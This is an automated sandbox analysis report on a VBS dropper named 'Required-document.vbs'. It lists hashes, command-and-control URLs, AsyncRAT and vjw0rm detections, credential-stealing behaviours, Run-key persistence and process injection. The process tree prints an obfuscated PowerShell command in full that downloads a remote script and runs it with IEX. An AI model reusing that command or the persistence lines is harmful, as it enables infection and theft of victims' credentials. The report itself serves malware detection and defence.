Analysis
-
max time kernel
1198s -
max time network
1202s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
27-02-2022 13:21
Static task
static1
Behavioral task
behavioral1
Sample
Required-document.vbs
Resource
win7-20220223-en
Behavioral task
behavioral2
Sample
Required-document.vbs
Resource
win10v2004-en-20220112
General
-
Target
Required-document.vbs
-
Size
59KB
-
MD5
a3b2efc3e12c3dd4f6c343d8e768a01c
-
SHA1
72cdb5d6fd134ec0920cb8b4342adf0e3a961025
-
SHA256
1836bc14a38837046d3937aef05eee266da919d296cfab066317b0db4ba48d21
-
SHA512
089140d2a092c8737aea06e959e06d674addba76a2be4114540a9616d450f5890d888624fcf73129e16801c97a5bd1be39544ccacb26e7f471f25b860f4b3e03
Malware Config
Extracted
http://ec2-3-235-29-66.compute-1.amazonaws.com/wrold/LM.txt
Extracted
http://ec2-3-235-29-66.compute-1.amazonaws.com/windows/Filnal.txt
Extracted
vjw0rm
http://invoice-update.myiphost.com:1188
Signatures
-
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2984-193-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat -
Blocklisted process makes network request 11 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 20 1612 powershell.exe 38 3800 powershell.exe 46 1612 powershell.exe 93 3188 powershell.exe 95 3188 powershell.exe 97 3188 powershell.exe 99 3188 powershell.exe 101 3188 powershell.exe 103 3188 powershell.exe 105 3188 powershell.exe 107 3188 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
Untitled.exe7z.exeAllInOnePasswordRecoveryPro.exepid process 3456 Untitled.exe 3904 7z.exe 3300 AllInOnePasswordRecoveryPro.exe -
Checks computer location settings 2 TTPs 14 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe -
Loads dropped DLL 2 IoCs
Processes:
7z.exeAllInOnePasswordRecoveryPro.exepid process 3904 7z.exe 3300 AllInOnePasswordRecoveryPro.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
AllInOnePasswordRecoveryPro.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts AllInOnePasswordRecoveryPro.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2 = "C:\\Windows\\System32\\cmd.exe '/c powershell -windo 1 -noexit -exec bypass -file C:\\ProgramData\\Twitter\\log\\look.ps1" reg.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1 = "C:\\ProgramData\\Twitter\\log\\Untitled.exe" reg.exe -
Suspicious use of SetThreadContext 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process target process PID 1140 set thread context of 2984 1140 powershell.exe aspnet_compiler.exe PID 3352 set thread context of 1276 3352 powershell.exe aspnet_compiler.exe PID 2196 set thread context of 2292 2196 powershell.exe aspnet_compiler.exe PID 2080 set thread context of 1568 2080 powershell.exe aspnet_compiler.exe PID 1256 set thread context of 1748 1256 powershell.exe aspnet_compiler.exe PID 1708 set thread context of 3920 1708 powershell.exe aspnet_compiler.exe PID 976 set thread context of 2496 976 powershell.exe aspnet_compiler.exe PID 556 set thread context of 492 556 powershell.exe aspnet_compiler.exe PID 2616 set thread context of 2208 2616 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings powershell.exe -
Processes:
Untitled.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f Untitled.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD Untitled.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f Untitled.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f Untitled.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f Untitled.exe -
Suspicious behavior: EnumeratesProcesses 57 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeaspnet_compiler.exepowershell.exeAllInOnePasswordRecoveryPro.exepowershell.exepowershell.exepowershell.exepid process 1612 powershell.exe 1612 powershell.exe 3800 powershell.exe 3800 powershell.exe 3168 powershell.exe 3168 powershell.exe 3260 powershell.exe 3260 powershell.exe 3260 powershell.exe 3260 powershell.exe 1140 powershell.exe 1140 powershell.exe 1140 powershell.exe 1140 powershell.exe 3260 powershell.exe 3260 powershell.exe 3352 powershell.exe 3352 powershell.exe 3260 powershell.exe 3260 powershell.exe 2196 powershell.exe 2196 powershell.exe 3260 powershell.exe 3260 powershell.exe 2080 powershell.exe 2080 powershell.exe 2080 powershell.exe 2080 powershell.exe 3260 powershell.exe 3260 powershell.exe 1256 powershell.exe 1256 powershell.exe 3260 powershell.exe 3260 powershell.exe 1708 powershell.exe 1708 powershell.exe 3260 powershell.exe 2080 powershell.exe 2984 aspnet_compiler.exe 2080 powershell.exe 3188 powershell.exe 3188 powershell.exe 3260 powershell.exe 3300 AllInOnePasswordRecoveryPro.exe 3300 AllInOnePasswordRecoveryPro.exe 976 powershell.exe 976 powershell.exe 3260 powershell.exe 3260 powershell.exe 556 powershell.exe 556 powershell.exe 3260 powershell.exe 3260 powershell.exe 2616 powershell.exe 2616 powershell.exe 3260 powershell.exe 3260 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1612 powershell.exe Token: SeDebugPrivilege 3800 powershell.exe Token: SeIncreaseQuotaPrivilege 3800 powershell.exe Token: SeSecurityPrivilege 3800 powershell.exe Token: SeTakeOwnershipPrivilege 3800 powershell.exe Token: SeLoadDriverPrivilege 3800 powershell.exe Token: SeSystemProfilePrivilege 3800 powershell.exe Token: SeSystemtimePrivilege 3800 powershell.exe Token: SeProfSingleProcessPrivilege 3800 powershell.exe Token: SeIncBasePriorityPrivilege 3800 powershell.exe Token: SeCreatePagefilePrivilege 3800 powershell.exe Token: SeBackupPrivilege 3800 powershell.exe Token: SeRestorePrivilege 3800 powershell.exe Token: SeShutdownPrivilege 3800 powershell.exe Token: SeDebugPrivilege 3800 powershell.exe Token: SeSystemEnvironmentPrivilege 3800 powershell.exe Token: SeRemoteShutdownPrivilege 3800 powershell.exe Token: SeUndockPrivilege 3800 powershell.exe Token: SeManageVolumePrivilege 3800 powershell.exe Token: 33 3800 powershell.exe Token: 34 3800 powershell.exe Token: 35 3800 powershell.exe Token: 36 3800 powershell.exe Token: SeIncreaseQuotaPrivilege 3800 powershell.exe Token: SeSecurityPrivilege 3800 powershell.exe Token: SeTakeOwnershipPrivilege 3800 powershell.exe Token: SeLoadDriverPrivilege 3800 powershell.exe Token: SeSystemProfilePrivilege 3800 powershell.exe Token: SeSystemtimePrivilege 3800 powershell.exe Token: SeProfSingleProcessPrivilege 3800 powershell.exe Token: SeIncBasePriorityPrivilege 3800 powershell.exe Token: SeCreatePagefilePrivilege 3800 powershell.exe Token: SeBackupPrivilege 3800 powershell.exe Token: SeRestorePrivilege 3800 powershell.exe Token: SeShutdownPrivilege 3800 powershell.exe Token: SeDebugPrivilege 3800 powershell.exe Token: SeSystemEnvironmentPrivilege 3800 powershell.exe Token: SeRemoteShutdownPrivilege 3800 powershell.exe Token: SeUndockPrivilege 3800 powershell.exe Token: SeManageVolumePrivilege 3800 powershell.exe Token: 33 3800 powershell.exe Token: 34 3800 powershell.exe Token: 35 3800 powershell.exe Token: 36 3800 powershell.exe Token: SeIncreaseQuotaPrivilege 3800 powershell.exe Token: SeSecurityPrivilege 3800 powershell.exe Token: SeTakeOwnershipPrivilege 3800 powershell.exe Token: SeLoadDriverPrivilege 3800 powershell.exe Token: SeSystemProfilePrivilege 3800 powershell.exe Token: SeSystemtimePrivilege 3800 powershell.exe Token: SeProfSingleProcessPrivilege 3800 powershell.exe Token: SeIncBasePriorityPrivilege 3800 powershell.exe Token: SeCreatePagefilePrivilege 3800 powershell.exe Token: SeBackupPrivilege 3800 powershell.exe Token: SeRestorePrivilege 3800 powershell.exe Token: SeShutdownPrivilege 3800 powershell.exe Token: SeDebugPrivilege 3800 powershell.exe Token: SeSystemEnvironmentPrivilege 3800 powershell.exe Token: SeRemoteShutdownPrivilege 3800 powershell.exe Token: SeUndockPrivilege 3800 powershell.exe Token: SeManageVolumePrivilege 3800 powershell.exe Token: 33 3800 powershell.exe Token: 34 3800 powershell.exe Token: 35 3800 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
AllInOnePasswordRecoveryPro.exepid process 3300 AllInOnePasswordRecoveryPro.exe 3300 AllInOnePasswordRecoveryPro.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WScript.execmd.execmd.exepowershell.exepowershell.exeWScript.execmd.exepowershell.exeWScript.execmd.exepowershell.exeWScript.execmd.exepowershell.exeWScript.execmd.exepowershell.exeWScript.exedescription pid process target process PID 312 wrote to memory of 2120 312 WScript.exe cmd.exe PID 312 wrote to memory of 2120 312 WScript.exe cmd.exe PID 2120 wrote to memory of 1612 2120 cmd.exe powershell.exe PID 2120 wrote to memory of 1612 2120 cmd.exe powershell.exe PID 312 wrote to memory of 3448 312 WScript.exe cmd.exe PID 312 wrote to memory of 3448 312 WScript.exe cmd.exe PID 3448 wrote to memory of 3800 3448 cmd.exe powershell.exe PID 3448 wrote to memory of 3800 3448 cmd.exe powershell.exe PID 1612 wrote to memory of 3916 1612 powershell.exe WScript.exe PID 1612 wrote to memory of 3916 1612 powershell.exe WScript.exe PID 3800 wrote to memory of 3168 3800 powershell.exe powershell.exe PID 3800 wrote to memory of 3168 3800 powershell.exe powershell.exe PID 3916 wrote to memory of 2424 3916 WScript.exe cmd.exe PID 3916 wrote to memory of 2424 3916 WScript.exe cmd.exe PID 2424 wrote to memory of 1208 2424 cmd.exe reg.exe PID 2424 wrote to memory of 1208 2424 cmd.exe reg.exe PID 2424 wrote to memory of 1036 2424 cmd.exe reg.exe PID 2424 wrote to memory of 1036 2424 cmd.exe reg.exe PID 1612 wrote to memory of 3260 1612 powershell.exe powershell.exe PID 1612 wrote to memory of 3260 1612 powershell.exe powershell.exe PID 3260 wrote to memory of 3456 3260 powershell.exe Untitled.exe PID 3260 wrote to memory of 3456 3260 powershell.exe Untitled.exe PID 3260 wrote to memory of 3456 3260 powershell.exe Untitled.exe PID 3284 wrote to memory of 3640 3284 WScript.exe cmd.exe PID 3284 wrote to memory of 3640 3284 WScript.exe cmd.exe PID 3640 wrote to memory of 1140 3640 cmd.exe powershell.exe PID 3640 wrote to memory of 1140 3640 cmd.exe powershell.exe PID 1140 wrote to memory of 3316 1140 powershell.exe aspnet_compiler.exe PID 1140 wrote to memory of 3316 1140 powershell.exe aspnet_compiler.exe PID 1140 wrote to memory of 3316 1140 powershell.exe aspnet_compiler.exe PID 1140 wrote to memory of 2984 1140 powershell.exe aspnet_compiler.exe PID 1140 wrote to memory of 2984 1140 powershell.exe aspnet_compiler.exe PID 1140 wrote to memory of 2984 1140 powershell.exe aspnet_compiler.exe PID 1140 wrote to memory of 2984 1140 powershell.exe aspnet_compiler.exe PID 1140 wrote to memory of 2984 1140 powershell.exe aspnet_compiler.exe PID 1140 wrote to memory of 2984 1140 powershell.exe aspnet_compiler.exe PID 1140 wrote to memory of 2984 1140 powershell.exe aspnet_compiler.exe PID 1140 wrote to memory of 2984 1140 powershell.exe aspnet_compiler.exe PID 1240 wrote to memory of 820 1240 WScript.exe cmd.exe PID 1240 wrote to memory of 820 1240 WScript.exe cmd.exe PID 820 wrote to memory of 3352 820 cmd.exe powershell.exe PID 820 wrote to memory of 3352 820 cmd.exe powershell.exe PID 3352 wrote to memory of 1276 3352 powershell.exe aspnet_compiler.exe PID 3352 wrote to memory of 1276 3352 powershell.exe aspnet_compiler.exe PID 3352 wrote to memory of 1276 3352 powershell.exe aspnet_compiler.exe PID 3352 wrote to memory of 1276 3352 powershell.exe aspnet_compiler.exe PID 3352 wrote to memory of 1276 3352 powershell.exe aspnet_compiler.exe PID 3352 wrote to memory of 1276 3352 powershell.exe aspnet_compiler.exe PID 3352 wrote to memory of 1276 3352 powershell.exe aspnet_compiler.exe PID 3352 wrote to memory of 1276 3352 powershell.exe aspnet_compiler.exe PID 524 wrote to memory of 940 524 WScript.exe cmd.exe PID 524 wrote to memory of 940 524 WScript.exe cmd.exe PID 940 wrote to memory of 2196 940 cmd.exe powershell.exe PID 940 wrote to memory of 2196 940 cmd.exe powershell.exe PID 2196 wrote to memory of 2292 2196 powershell.exe aspnet_compiler.exe PID 2196 wrote to memory of 2292 2196 powershell.exe aspnet_compiler.exe PID 2196 wrote to memory of 2292 2196 powershell.exe aspnet_compiler.exe PID 2196 wrote to memory of 2292 2196 powershell.exe aspnet_compiler.exe PID 2196 wrote to memory of 2292 2196 powershell.exe aspnet_compiler.exe PID 2196 wrote to memory of 2292 2196 powershell.exe aspnet_compiler.exe PID 2196 wrote to memory of 2292 2196 powershell.exe aspnet_compiler.exe PID 2196 wrote to memory of 2292 2196 powershell.exe aspnet_compiler.exe PID 3336 wrote to memory of 2496 3336 WScript.exe cmd.exe PID 3336 wrote to memory of 2496 3336 WScript.exe cmd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Required-document.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:312 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C POWERSHELL.EXE -exec Bypass -C [System.Net.WebClient]$webClient = N`e`w-Object System.Net.WebClient;[System.IO.Stream]$23830 = $webClient.OpenRead('http://ec2-3-235-29-66.compute-1.amazonaws.com/wrold/LM.txt');[System.IO.StreamReader]$17112 = N`e`w-Object System.IO.StreamReader -argumentList $23830;[System.Threading.Thread]::Sleep(1000);[string]$68248 = $17112.ReadToEnd();IEX $68248;2⤵
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWERSHELL.EXE -exec Bypass -C [System.Net.WebClient]$webClient = N`e`w-Object System.Net.WebClient;[System.IO.Stream]$23830 = $webClient.OpenRead('http://ec2-3-235-29-66.compute-1.amazonaws.com/wrold/LM.txt');[System.IO.StreamReader]$17112 = N`e`w-Object System.IO.StreamReader -argumentList $23830;[System.Threading.Thread]::Sleep(1000);[string]$68248 = $17112.ReadToEnd();IEX $68248;3⤵
- Blocklisted process makes network request
- Modifies registry class
